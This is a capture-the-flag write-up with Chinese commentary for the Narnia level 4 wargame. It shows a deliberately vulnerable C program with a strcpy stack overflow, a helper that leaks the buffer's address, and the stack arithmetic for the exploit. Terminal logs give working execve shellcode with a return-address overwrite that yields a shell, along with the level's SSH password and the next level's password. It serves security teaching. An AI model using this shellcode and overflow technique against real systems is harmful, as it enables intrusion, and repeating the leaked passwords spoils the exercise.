/** narnia4.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
extern char **environ;
/*
 * Entry point of the narnia4 challenge binary.
 *
 * Wipes every environment string in place, then copies argv[1] into a
 * fixed 256-byte stack buffer with strcpy().  The copy is unbounded: an
 * argument longer than the buffer overwrites whatever the compiler placed
 * above it (on a conventional frame, the saved frame pointer and the return
 * address).  This stack-based buffer overflow (CWE-121) is the intended
 * vulnerability of the level; nothing here is a pattern to reuse.
 *
 * argc/argv: standard; only argv[1] is read.
 * Returns 0 (unless a corrupted return address diverts control first).
 */
int main(int argc,char **argv){
int i;
char buffer[256];
/* Zero each environment string up to its NUL -- presumably so nothing
 * attacker-controlled can be staged in the environment.  The argv strings
 * (argv[0] included) are not touched, so the length of the path used to
 * launch the program still shifts where `buffer` ends up on the stack. */
for(i = 0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
/* Unbounded copy: strcpy() stops at argv[1]'s NUL, never at sizeof buffer.
 * A bounded copy such as snprintf(buffer, sizeof buffer, "%s", argv[1])
 * would close the hole; it is deliberately left as-is for the exercise. */
if(argc>1)
strcpy(buffer,argv[1]);
return 0;
}
/** nar.c */
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
extern char **environ;
/*
 * Helper used to measure where `buffer` lands on the stack: the narnia4
 * main() with a single printf("%p\n", buffer) added in front of the
 * environment wipe.  Everything else is kept verbatim so that the frame
 * layout matches the target as closely as possible.
 *
 * Caveats:
 *  - The printed address is only useful if it is stable between runs
 *    (stack randomisation off) and if this file is built with the same
 *    architecture and hardening flags as the real binary; a different frame
 *    layout, an extra local or a stack protector would move `buffer`.
 *  - The argv strings are not wiped, so the length of the path used to
 *    launch the target still has to be accounted for separately.
 *
 * argc/argv: standard; only argv[1] is read.
 * Returns 0 (or never returns normally when argv[1] overruns the frame).
 */
int main(int argc,char **argv){
int i;
char buffer[256];
/* Leak the buffer's address -- the only line that differs from narnia4.c. */
printf("%p\n", buffer);
/* Same environment wipe as the target. */
for(i = 0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
/* Same unbounded strcpy() as the target: argv[1] longer than 256 bytes
 * overruns `buffer` (CWE-121). */
if(argc>1)
strcpy(buffer,argv[1]);
return 0;
}
棧環境
要把shellcode放在buffer中, 但是不知道buffer的地址. nar.c 只比 narnia4.c 多了一行 printf("%p\n", buffer), 用它測出 buffer 的地址; 這個方法的前提是棧地址在多次執行之間保持不變 (即 ASLR 關閉), 並且 nar 要用與目標相同的架構和編譯選項 (-m32 -z execstack -fno-stack-protector) 來編譯, 否則棧幀佈局會不同.
narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit
通過測試我們知道當可執行程序爲 ./nar 時, buffer的地址爲0xffffd3dc (兩次執行打印出同一個地址, 說明棧地址沒有隨機化). 注意 shellcode 放在 buffer 的最開頭, 後面的 0x90 只是填充而不是可供落點的 NOP sled, 所以返回地址必須正好指向 buffer 的起始地址: 第一次猜 0xffffd3c8 落在 buffer 之前, 於是 Segmentation fault; 第二次用 0xffffd3dc 才拿到 shell.
那我們可以計算出當可執行程序爲 /narnia/narnia4 時, buffer的地址爲 0xffffd3cc
計算過程如下:
./nar 的長度爲5個字節 (算上結尾的 NUL 是 6 字節), 根據narnia2瞭解到, 在環境變量之前有兩個與程序路徑有關的字符串 (argv[0] 以及內核放在棧頂的可執行文件路徑), 合計 10 字節 (含 NUL 則 12 字節), 進入 main 時棧按 16 字節對齊, 那麼就佔 16 字節
/narnia/narnia4長度是15字節 (含 NUL 是 16 字節), 同樣有兩個與程序路徑有關的字符串, 合計 30 字節 (含 NUL 則 32 字節), 按 16 字節對齊後就是 32 字節. 無論是否計入 NUL, 對齊後的結果都一樣
這樣就可以知道 以./nar 運行的程序的buffer地址 比 以/narnia/narnia4運行的程序的buffer地址 大16字節
那麼以/narnia/narnia4運行的程序的buffer地址爲 0xffffd3cc
root@yangq:~# ssh [email protected]
[email protected]'s password: thaenohtai
narnia4@melinda:~$ cd /tmp/shadowcoder4
narnia4@melinda:/tmp/shadowcoder4$ ls
nar nar.c narnia4 narnia4.c sleep.sh
narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit
narnia4@melinda:/tmp/shadowcoder4$ /narnia/narnia4 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xcc\xd3\xff\xff"'`
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
$